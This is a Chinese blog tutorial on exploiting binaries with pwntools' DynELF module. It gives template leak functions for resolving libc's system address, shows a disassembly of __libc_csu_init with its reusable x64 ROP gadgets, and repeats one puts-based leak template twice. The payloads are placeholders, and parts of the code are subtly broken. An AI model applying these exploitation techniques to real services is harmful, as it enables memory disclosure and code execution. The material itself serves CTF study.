DynELF

作者: 喝豆腐脑加糖 | 来源:发表于2019-03-15 20:58 被阅读0次

在没有libc的时候,使用pwntools的DynELF可以来泄露地址
leak函数格式

p = process('./xxx')
def leak(address):
  payload = "xxxxxxxx" + address + "xxxxxxxx"
  p.send(payload)
  #各种处理
  data = p.recv(4)
  log.debug("%#x => %s" % (address, (data or '').encode('hex')))
  return data
d = DynELF(leak, elf=ELF("./xxx"))      #初始化DynELF模块 
systemAddress = d.lookup('system', 'libc')  #在libc文件中搜索system函数的地址

address是需要泄露地址的信息,payload就是触发目标程序泄漏address处信息的攻击代码。

当我们想要调用system函数,就必须找到一个可以泄漏目标程序内部的地址,进而计算出偏移。

文章上介绍的是很常见的puts,write函数


Linux:
write(fd, addr, len) x86下就是正常的参数从右向左进栈。

在x64下通常是rdi,rsi,rdx,rcx,r8,r9从左向右来接收参数,更多的才写到栈上。所以当rop链不能构成时就可以使用 __libc_csu_init函数中的通用gadget。


_libc_csu_init函数是程序调用libc库用来对程序进行初始化的函数,一般先于main函数执行

text:00000000004006E0 ; void _libc_csu_init(void)
.text:00000000004006E0                 public __libc_csu_init
.text:00000000004006E0 __libc_csu_init proc near               ; DATA XREF: _start+16↑o
.text:00000000004006E0 ; __unwind {
.text:00000000004006E0                 push    r15
.text:00000000004006E2                 mov     r15d, edi
.text:00000000004006E5                 push    r14
.text:00000000004006E7                 mov     r14, rsi
.text:00000000004006EA                 push    r13
.text:00000000004006EC                 mov     r13, rdx
.text:00000000004006EF                 push    r12
.text:00000000004006F1                 lea     r12, __frame_dummy_init_array_entry
.text:00000000004006F8                 push    rbp
.text:00000000004006F9                 lea     rbp, __do_global_dtors_aux_fini_array_entry
.text:0000000000400700                 push    rbx
.text:0000000000400701                 sub     rbp, r12
.text:0000000000400704                 xor     ebx, ebx
.text:0000000000400706                 sar     rbp, 3
.text:000000000040070A                 sub     rsp, 8
.text:000000000040070E                 call    _init_proc
.text:0000000000400713                 test    rbp, rbp
.text:0000000000400716                 jz      short loc_400736
.text:0000000000400718                 nop     dword ptr [rax+rax+00000000h]
.text:0000000000400720
.text:0000000000400720 loc_400720:                             ; CODE XREF: __libc_csu_init+54↓j

************************************************************
.text:0000000000400720                 mov     rdx, r13
.text:0000000000400723                 mov     rsi, r14
.text:0000000000400726                 mov     edi, r15d
.text:0000000000400729                 call    qword ptr [r12+rbx*8]
.text:000000000040072D                 add     rbx, 1
.text:0000000000400731                 cmp     rbx, rbp
.text:0000000000400734                 jnz     short loc_400720
.text:0000000000400736
.text:0000000000400736 loc_400736: 

                    ; CODE XREF: __libc_csu_init+36↑j
*************************************************************
.text:0000000000400736                 add     rsp, 8
.text:000000000040073A                 pop     rbx
.text:000000000040073B                 pop     rbp
.text:000000000040073C                 pop     r12
.text:000000000040073E                 pop     r13
.text:0000000000400740                 pop     r14
.text:0000000000400742                 pop     r15
.text:0000000000400744                 retn

这两部分便是gadget,0x040073A处可以把我们想要写入的数据来进行压栈。而且在里面隐藏了两个常用的gadget


图片.png

pop rdi;ret和pop rsi;pop r15

0x41 0x5f 0xc3
0x5f 0xc3

puts函数:puts(addr)从地址处输出字符串,当读到"\x00"时截断。
leak函数(之后没有其他输出)

def leak(address):
  count = 0
  data = ''
  payload = xxx
  p.send(payload)
  print p.recvuntil('xxxn') #一定要在puts前释放完输出
  up = ""
  while True:
    #由于接收完标志字符串结束的回车符后,就没有其他输出了,故先等待1秒钟,如果确实接收不到了,就说明输出结束了
    #以便与不是标志字符串结束的回车符(0x0A)混淆,这也利用了recv函数的timeout参数,即当timeout结束后仍得不到输出,则直接返回空字符串””
    c = p.recv(numb=1, timeout=1)
    count += 1
    if up == 'n' and c == "":  #接收到的上一个字符为回车符,而当前接收不到新字符,则
      buf = buf[:-1]             #删除puts函数输出的末尾回车符
      buf += "x00"
      break
    else:
      buf += c
    up = c
  data = buf[:4]  #取指定字节数
  log.info("%#x => %s" % (address, (data or '').encode('hex')))
  return data

还有其他输出

def leak(address):
  count = 0
  data = ''
  payload = xxx
  p.send(payload)
  print p.recvuntil('xxxn') #一定要在puts前释放完输出
  up = ""
  while True:
    #由于接收完标志字符串结束的回车符后,就没有其他输出了,故先等待1秒钟,如果确实接收不到了,就说明输出结束了
    #以便与不是标志字符串结束的回车符(0x0A)混淆,这也利用了recv函数的timeout参数,即当timeout结束后仍得不到输出,则直接返回空字符串””
    c = p.recv(numb=1, timeout=1)
    count += 1
    if up == 'n' and c == "":  #接收到的上一个字符为回车符,而当前接收不到新字符,则
      buf = buf[:-1]             #删除puts函数输出的末尾回车符
      buf += "x00"
      break
    else:
      buf += c
    up = c
  data = buf[:4]  #取指定字节数
  log.info("%#x => %s" % (address, (data or '').encode('hex')))
  return data

相关文章

  • 无libc泄露地址

    用pwntools的DynELF模块来实现 DynELF的基本框架 p = process('./xxx')def...

  • DynELF

    XMAN的level4,逻辑很简单,可以覆盖返回地址,但是由于没有提供libc,需要用pwntools的DynEL...

  • DynELF

    在没有libc的时候,使用pwntools的DynELF可以来泄露地址leak函数格式 address是需要泄露地...

  • Memory Leak & DynELF

    很多情况下,我们无法获得目标程序的libc,因此无法通过ret2libc的方式得到system函数的地址,这种情况...

  • PWN to MIPS by the DynELF

    参照https://www.jianshu.com/p/25d709016f4e[https://www.jian...

  • [JarvisOj](pwn)level2

    简介 : 地址 : 利用代码 : 【技术分享】借助DynELF实现无libc的漏洞利用小结Paste_Image....

  • DynELF函数泄漏遇到的坑

    最近在学用DynELF + puts函数泄漏system地址从而getshell,遇到几个坑 get函数溢出时不适...

  • 五_4.泄露libc_XDCTF 2015-pwn20_32

    一道三无的题(无libc无system无/bin/sh) 利用pwntools的DynELF框架(专门解决泄露远程...

  • pwntools的DynELF模块模板:

    参考:https://www.anquanke.com/post/id/85129 普通模板 puts函数 put...

  • xctf-pwn100

    这道题方法是通过pwntools的DynELF模块来做具体可以参考i春秋里面的这篇文章很详细Linux pwn入门...

网友评论

      本文标题:DynELF

      本文链接:https://www.haomeiwen.com/subject/sakrmqtx.html